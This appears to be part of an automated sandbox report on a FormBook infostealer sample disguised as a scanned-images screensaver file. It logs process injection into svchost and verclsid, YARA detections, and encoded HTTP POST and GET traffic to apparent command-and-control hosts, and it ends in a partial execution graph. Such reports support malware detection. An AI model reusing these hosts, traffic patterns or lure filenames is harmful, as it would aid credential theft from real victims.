                                                                              Data Raw: 77 7a 34 3d 72 4e 4c 57 76 63 4e 46 5a 30 2f 34 6e 55 57 55 35 31 69 4d 52 49 4a 2b 47 49 6d 6c 35 67 32 62 44 30 74 39 4f 71 30 79 72 79 6e 62 32 75 57 55 52 36 4c 4f 48 50 41 6b 75 6f 42 32 35 2b 62 54 73 63 69 33 62 64 74 63 79 70 6f 77 42 64 49 6e 43 6f 70 76 6b 39 6a 5a 63 79 74 57 58 58 78 66 31 70 30 57 64 43 4c 37 6a 55 62 73 6d 65 61 43 4e 6c 65 50 49 2b 46 77 71 31 6e 35 6f 34 4f 58 38 56 46 32 73 6e 78 43 48 4d 4e 51 72 79 42 30 4e 50 4e 79 33 78 72 36 67 30 78 37 6f 50 48 36 70 30 74 50 63 49 47 56 65 75 37 36 62 50 4d 55 76 72 36 41 59 42 6e 32 51 59 67 66 48 75 6e 53 75 74 79 59 51 77 6e 75 50 6e 75 6f 44 67 72 57 65 59 56 6b 56 2f 6b 3d
                                                                              Data Ascii: wz4=rNLWvcNFZ0/4nUWU51iMRIJ+GIml5g2bD0t9Oq0yrynb2uWUR6LOHPAkuoB25+bTsci3bdtcypowBdInCopvk9jZcytWXXxf1p0WdCL7jUbsmeaCNlePI+Fwq1n5o4OX8VF2snxCHMNQryB0NPNy3xr6g0x7oPH6p0tPcIGVeu76bPMUvr6AYBn2QYgfHunSutyYQwnuPnuoDgrWeYVkV/k=
                                                                              Jan 14, 2025 10:26:24.615047932 CET  73                 IN         HTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              27          192.168.2.4  57610        3.33.130.190    80                4944  C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 14, 2025 10:26:26.700403929 CET  10808              OUT        POST /otgv/ HTTP/1.1
                                                                              Host: www.livingslab.net
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.livingslab.net
                                                                              Referer: http://www.livingslab.net/otgv/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 72 4e 4c 57 76 63 4e 46 5a 30 2f 34 6e 55 57 55 35 31 69 4d 52 49 4a 2b 47 49 6d 6c 35 67 32 62 44 30 74 39 4f 71 30 79 72 79 76 62 33 65 4b 55 54 64 6e 4f 47 50 41 6b 6a 49 42 33 35 2b 62 30 73 63 36 7a 62 64 68 32 79 71 51 77 4f 66 41 6e 54 4b 42 76 39 4e 6a 5a 44 69 74 58 4a 6e 78 4f 31 76 55 53 64 45 72 37 6a 55 62 73 6d 63 43 43 4c 33 6d 50 4b 2b 46 76 70 31 6e 31 73 34 4f 2f 38 56 64 41 73 6e 30 33 48 38 74 51 6f 53 52 30 4c 39 56 79 31 52 72 34 6e 30 78 5a 6f 50 61 67 70 31 42 31 63 49 61 2f 65 70 7a 36 52 4b 74 70 2f 36 79 33 47 69 33 33 4f 76 45 55 66 4f 58 50 33 64 47 36 58 41 76 50 54 6e 6d 45 41 77 6a 61 62 61 4d 6d 4b 50 49 4f 56 59 4f 32 4a 4d 36 68 65 71 47 6a 35 62 42 46 4f 7a 4a 58 4f 4c 65 36 49 75 6b 36 78 62 53 43 64 6b 4b 49 71 48 53 6a 36 64 61 73 6e 37 74 59 68 45 61 65 34 7a 59 61 47 52 52 69 4b 47 5a 42 4c 76 53 78 52 6c 63 41 74 65 69 53 69 44 53 73 64 6e 4f 61 33 63 38 4a 72 63 36 54 44 53 61 67 72 6c 4d 34 71 6e 4c 5a 37 6d 62 42 70 30 6f 5a 75 62 76 52 38 4f [TRUNCATED]
                                                                              Data Ascii: wz4= [TRUNCATED]
                                                                              Jan 14, 2025 10:26:27.158287048 CET  73                 IN         HTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              28          192.168.2.4  57611        3.33.130.190    80                4944  C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 14, 2025 10:26:29.244163990 CET  441                OUT        GET /otgv/?wz4=mPj2soEUEFmq5Xu56Ev9ENs/GIe87AemMTFSPosGtz7M/tXNad3AOcc3teRO2drll+qYOuNJorQ/HJUWSqoYkO/lFhsMOlB8p4kTaBK5nEPe9NarMUavWdI=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.livingslab.net
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:26:29.699184895 CET379INHTTP/1.1 200 OK
                                                                              content-type: text/html
                                                                              date: Tue, 14 Jan 2025 09:26:29 GMT
                                                                              content-length: 258
                                                                              connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wz4=mPj2soEUEFmq5Xu56Ev9ENs/GIe87AemMTFSPosGtz7M/tXNad3AOcc3teRO2drll+qYOuNJorQ/HJUWSqoYkO/lFhsMOlB8p4kTaBK5nEPe9NarMUavWdI=&OvV=2njD6f80EDOLQ8"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 57612 | 20.244.96.65 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:26:34.751840115 CET | 721 | OUT | POST /rdfj/ HTTP/1.1
Host: www.quickcommerce.cloud
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.quickcommerce.cloud
Referer: http://www.quickcommerce.cloud/rdfj/
Cache-Control: no-cache
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4=b0et2QcPcb1sfv8kuY/n4OUkUhL5ezUx23rVhilHyJEwIw14iuelYC6AbMy1JP3Btv3pxHNa4RFHxtBepz0ui7xG2cSDP8G0fmrGYYMRJPhiodt6JAspm4NpsSid52/k1ToykJAGuxmL2hlgMF2WS715gDmjcBVhLji40qTpXdnxshq50huYVXQS71KXqEplng==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 57613 | 20.244.96.65 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:26:37.296001911 CET | 741 | OUT | POST /rdfj/ HTTP/1.1
Host: www.quickcommerce.cloud
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.quickcommerce.cloud
Referer: http://www.quickcommerce.cloud/rdfj/
Cache-Control: no-cache
Connection: close
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4=b0et2QcPcb1sePMkie3n6uUlRhL5LDU1233Vhjway6wwLQF4w/elZC6AUsz9Rv3wtvLPxHBa4RRHxvpeoDIvjrxEo8SBFcG0fmrGYYw7JPZiot96Lhsq6oNu7iid92/g1ToqkLksu3iL2gVgMRaXJr1/9TnOaQwRD2bi9Jz6T5XSpnnjlQPPHX0hmyDjnHUs8god5oZYH9oPjZ3f+b/WKTs=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 57614 | 20.244.96.65 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:26:39.842066050 CET | 10823 | OUT | POST /rdfj/ HTTP/1.1
Host: www.quickcommerce.cloud
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.quickcommerce.cloud
Referer: http://www.quickcommerce.cloud/rdfj/
Cache-Control: no-cache
Connection: close
Content-Length: 10300
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 57615 | 20.244.96.65 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:26:42.389491081 CET | 446 | OUT | GET /rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/LgqczUnn1NrDdL/bN6nwlekL5Do//GTuaTPhPlYdtLOoB+gLN1EC4FlrA=&OvV=2njD6f80EDOLQ8 HTTP/1.1
Host: www.quickcommerce.cloud
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Jan 14, 2025 10:26:43.766833067 CET | 646 | IN | HTTP/1.1 301 Moved Permanently
content-type: text/html; charset=UTF-8
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
x-redirect-by: WordPress
location: http://quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/LgqczUnn1NrDdL/bN6nwlekL5Do//GTuaTPhPlYdtLOoB+gLN1EC4FlrA=&OvV=2njD6f80EDOLQ8
x-litespeed-cache-control: public,max-age=3600
x-litespeed-tag: 89f_HTTP.404,89f_HTTP.301,89f_404,89f_URL.246f60e15357fcc9eb3214bcdd20f5a9,89f_
x-litespeed-cache: miss
content-length: 0
date: Tue, 14 Jan 2025 09:26:43 GMT
server: LiteSpeed
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 57616 | 84.32.84.32 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:26:56.913213968 CET | 706 | OUT | POST /8vp1/ HTTP/1.1
Host: www.xpremio.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.xpremio.online
Referer: http://www.xpremio.online/8vp1/
Cache-Control: no-cache
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4=yJ7AUSgxjizn5kO5bRFaTi3bBwA+dq/KQdm77zaeFQaj4XYRTys6m/XMA4j1wCWuXQYL/rTD1tjakDb1ec4+3cuUjMh4Ipfsqf1OMN8Nq1qZvLAUX55SUe+YZ3BNR2B2hG9ec/fwknPB8zpYUvc+d3GSRv3qyZG+vj9G85PkdtMxwF1MnuaCb7RHMtL7WFL9xg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 57617 | 84.32.84.32 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:26:59.450258017 CET | 726 | OUT | POST /8vp1/ HTTP/1.1
Host: www.xpremio.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.xpremio.online
Referer: http://www.xpremio.online/8vp1/
Cache-Control: no-cache
Connection: close
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4=yJ7AUSgxjizn4HW5ICdaCS3aYAA+E6+iQd677yuOGlCj2VQRS3A6z/XMIYjw/iW5XQk1/qvD1t3akHL1et450suassh6HJfsqf1OMNBiq1CZu6wUVdtTd++ba3BNbWByhG8Jc7fKklHB8zZYNec5U3GcVv2W84jTr2MdhYT3UMgt4j4W2f7VJ710RqCPbG20qm52Qh07iZdEEL4YYhcDFjI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 57618 | 84.32.84.32 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:27:02.001713037 CET | 10808 | OUT | POST /8vp1/ HTTP/1.1
Host: www.xpremio.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.xpremio.online
Referer: http://www.xpremio.online/8vp1/
Cache-Control: no-cache
Connection: close
Content-Length: 10300
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 57619 | 84.32.84.32 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:27:04.672426939 CET | 441 | OUT | GET /8vp1/?wz4=/LTgXn1km3iwlVyiegwnGjWZZFB0eLisfcmkyyqxOnWJ8H9CeAgPjsH/KIvj3CyMdhcMqJeWq/63o3TMWNYzsf+ek40CYofT8u9WJYZhwl3Hq5liXp4GPpE=&OvV=2njD6f80EDOLQ8 HTTP/1.1
Host: www.xpremio.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Jan 14, 2025 10:27:05.120187044 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 09:27:05 GMT
Content-Type: text/html
Content-Length: 9973
Connection: close
Vary: Accept-Encoding
Server: hcdn
alt-svc: h3=":443"; ma=86400
x-hcdn-request-id: 907e6d0a26500b5a5b81ff370f04a723-bos-edge2
Expires: Tue, 14 Jan 2025 09:27:04 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                              Jan 14, 2025 10:27:05.120407104 CET1236INData Raw: 2c 74 26 26 79 2e 73 70 6c 69 63 65 28 66 2c 30 2c 65 2e 63 68 61 72 43 6f 64 65 41 74 28 64 2d 31 29 2d 36 35 3c 32 36 29 2c 6d 2e 73 70 6c 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e
                                                                              Data Ascii: ,t&&y.splice(f,0,e.charCodeAt(d-1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w
                                                                              Jan 14, 2025 10:27:05.120420933 CET200INData Raw: 6d 61 74 63 68 28 2f 5e 78 6e 2d 2d 2f 29 3f 70 75 6e 79 63 6f 64 65 2e 64 65 63 6f 64 65 28 74 2e 73 6c 69 63 65 28 34 29 29 3a 74 29 7d 72 65 74 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 2e 22 29 7d 7d 2c 70 61 74 68 4e 61 6d 65 3d 77 69 6e 64 6f 77
                                                                              Data Ascii: match(/^xn--/)?punycode.decode(t.slice(4)):t)}return e.join(".")}},pathName=window.location.hostname,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                              Target ID:0
                                                                              Start time:04:23:59
                                                                              Start date:14/01/2025
                                                                              Path:C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"
                                                                              Imagebase:0x450000
                                                                              File size:1'613'824 bytes
                                                                              MD5 hash:17CBB82B7DB7A77DF6507DD32AF10563
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:04:24:00
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"
                                                                              Imagebase:0x30000
                                                                              File size:46'504 bytes
                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1835373056.00000000091A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1830333241.0000000005AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:04:24:05
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe"
                                                                              Imagebase:0x130000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3549362625.0000000004810000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:04:24:07
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\SysWOW64\verclsid.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\verclsid.exe"
                                                                              Imagebase:0x8a0000
                                                                              File size:11'776 bytes
                                                                              MD5 hash:190A347DF06F8486F193ADA0E90B49C5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:7
                                                                              Start time:04:24:21
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe"
                                                                              Imagebase:0x130000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:8
                                                                              Start time:04:24:32
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x130000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                                Execution Graph

                                                                                Execution Coverage:2.7%
                                                                                Dynamic/Decrypted Code Coverage:2%
                                                                                Signature Coverage:3.5%
                                                                                Total number of Nodes:1634
                                                                                Total number of Limit Nodes:44
                                                                                execution_graph 95029 45dee5 95032 45b710 95029->95032 95033 45b72b 95032->95033 95034 4a00f8 95033->95034 95035 4a0146 95033->95035 95058 45b750 95033->95058 95038 4a0102 95034->95038 95041 4a010f 95034->95041 95034->95058 95098 4d58a2 207 API calls 2 library calls 95035->95098 95096 4d5d33 207 API calls 95038->95096 95059 45ba20 95041->95059 95097 4d61d0 207 API calls 2 library calls 95041->95097 95044 4a03d9 95044->95044 95046 45bbe0 40 API calls 95046->95058 95048 46d336 40 API calls 95048->95058 95050 45ba4e 95051 4a0322 95105 4d5c0c 82 API calls 95051->95105 95058->95046 95058->95048 95058->95050 95058->95051 95058->95059 95063 45ec40 95058->95063 95087 45a81b 41 API calls 95058->95087 95088 46d2f0 40 API calls 95058->95088 95089 46a01b 207 API calls 95058->95089 95090 470242 5 API calls __Init_thread_wait 95058->95090 95091 46edcd 22 API calls 95058->95091 95092 4700a3 29 API calls __onexit 95058->95092 95093 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95058->95093 95094 46ee53 82 API calls 95058->95094 95095 46e5ca 207 API calls 95058->95095 95099 45aceb 23 API calls ISource 95058->95099 95100 4af6bf 23 API calls 95058->95100 95101 45a8c7 95058->95101 95059->95050 95106 4c359c 82 API calls __wsopen_s 95059->95106 95068 45ec76 ISource 95063->95068 95064 46fddb 22 API calls 95064->95068 95065 4a4beb 95112 4c359c 82 API calls __wsopen_s 95065->95112 95067 45fef7 95069 45ed9d ISource 95067->95069 95074 45a8c7 22 API calls 95067->95074 95068->95064 95068->95065 95068->95067 95068->95069 95071 4a4b0b 95068->95071 95072 45a8c7 22 API calls 95068->95072 95075 4a4600 95068->95075 95079 470242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95068->95079 95080 45fbe3 95068->95080 95081 45a961 22 API calls 95068->95081 95083 4700a3 29 API calls pre_c_initialization 95068->95083 95085 4701f8 
EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95068->95085 95086 45f3ae ISource 95068->95086 95107 4601e0 207 API calls 2 library calls 95068->95107 95108 4606a0 41 API calls ISource 95068->95108 95069->95058 95110 4c359c 82 API calls __wsopen_s 95071->95110 95072->95068 95074->95069 95075->95069 95078 45a8c7 22 API calls 95075->95078 95078->95069 95079->95068 95080->95069 95082 4a4bdc 95080->95082 95080->95086 95081->95068 95111 4c359c 82 API calls __wsopen_s 95082->95111 95083->95068 95085->95068 95086->95069 95109 4c359c 82 API calls __wsopen_s 95086->95109 95087->95058 95088->95058 95089->95058 95090->95058 95091->95058 95092->95058 95093->95058 95094->95058 95095->95058 95096->95041 95097->95059 95098->95058 95099->95058 95100->95058 95102 45a8ea __fread_nolock 95101->95102 95103 45a8db 95101->95103 95102->95058 95103->95102 95113 46fe0b 95103->95113 95105->95059 95106->95044 95107->95068 95108->95068 95109->95069 95110->95069 95111->95065 95112->95069 95115 46fddb 95113->95115 95116 46fdfa 95115->95116 95119 46fdfc 95115->95119 95123 47ea0c 95115->95123 95130 474ead 7 API calls 2 library calls 95115->95130 95116->95102 95118 47066d 95132 4732a4 RaiseException 95118->95132 95119->95118 95131 4732a4 RaiseException 95119->95131 95121 47068a 95121->95102 95128 483820 _abort 95123->95128 95124 48385e 95134 47f2d9 20 API calls _abort 95124->95134 95126 483849 RtlAllocateHeap 95127 48385c 95126->95127 95126->95128 95127->95115 95128->95124 95128->95126 95133 474ead 7 API calls 2 library calls 95128->95133 95130->95115 95131->95118 95132->95121 95133->95128 95134->95127 95135 451044 95140 4510f3 95135->95140 95137 45104a 95176 4700a3 29 API calls __onexit 95137->95176 95139 451054 95177 451398 95140->95177 95144 45116a 95187 45a961 95144->95187 95147 45a961 22 API calls 95148 45117e 95147->95148 95149 45a961 22 API calls 95148->95149 95150 451188 95149->95150 95151 45a961 22 API calls 95150->95151 95152 4511c6 95151->95152 95153 
